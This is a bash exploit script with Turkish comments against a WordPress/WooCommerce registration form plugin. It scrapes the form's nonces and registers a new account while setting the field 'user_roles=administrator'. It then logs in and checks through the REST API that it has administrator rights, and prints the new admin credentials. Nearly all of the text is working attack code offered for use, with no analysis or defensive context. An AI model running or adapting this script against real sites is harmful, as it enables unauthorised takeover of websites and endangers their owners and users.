#!/bin/bash TARGET="https://target-site.com" PAGE_ID="123" echo "[*] Exploit başlatılıyor..." # 1. Form bilgilerini al echo "[+] Form bilgileri alınıyor..." FORM_ID=$(curl -s "${TARGET}/?p=${PAGE_ID}" | grep -oP 'name="tgwcfb_id"\s+value="\K[^"]+') WC_NONCE=$(curl -s "${TARGET}/?p=${PAGE_ID}" | grep -oP 'name="woocommerce-register-nonce"\s+value="\K[^"]+') TGWCFB_NONCE=$(curl -s "${TARGET}/?p=${PAGE_ID}" | grep -oP 'name="tgwcfb-register-nonce"\s+value="\K[^"]+') # 2. Admin oluştur TIMESTAMP=$(date +%s) EVIL_USER="eviladmin${TIMESTAMP}" EVIL_PASS="EvilPass123!${TIMESTAMP}" echo "[+] Admin kullanıcı oluşturuluyor: ${EVIL_USER}" curl -s -c cookies.txt "${TARGET}/?p=${PAGE_ID}" \ -X POST \ -d "username=${EVIL_USER}" \ -d "email=eviladmin${TIMESTAMP}@evil.com" \ -d "password=${EVIL_PASS}" \ -d "user_roles=administrator" \ -d "tgwcfb_id=${FORM_ID}" \ -d "woocommerce-register-nonce=${WC_NONCE}" \ -d "tgwcfb-register-nonce=${TGWCFB_NONCE}" \ -d "_wp_http_referer=/?p=${PAGE_ID}" \ -d "register=Register" > /dev/null # 3. Giriş yap echo "[+] Admin girişi yapılıyor..." curl -s -b cookies.txt -c cookies.txt "${TARGET}/wp-login.php" \ -X POST \ -d "log=${EVIL_USER}" \ -d "pwd=${EVIL_PASS}" \ -d "wp-submit=Log In" \ -d "testcookie=1" > /dev/null # 4. Doğrulama echo "[+] Admin erişimi doğrulanıyor..." REST_NONCE=$(curl -s -b cookies.txt "${TARGET}/wp-admin/admin-ajax.php?action=rest-nonce") ROLES=$(curl -s -b cookies.txt "${TARGET}/?rest_route=/wp/v2/users/me&context=edit" \ -H "X-WP-Nonce: ${REST_NONCE}" | grep -o '"roles":\[[^]]*\]') if [[ $ROLES == *"administrator"* ]]; then echo "[✓] BAŞARILI!" echo "Admin URL: ${TARGET}/wp-admin/" echo "Kullanıcı: ${EVIL_USER}" echo "Şifre: ${EVIL_PASS}" else echo "[✗] Başarısız oldu" fi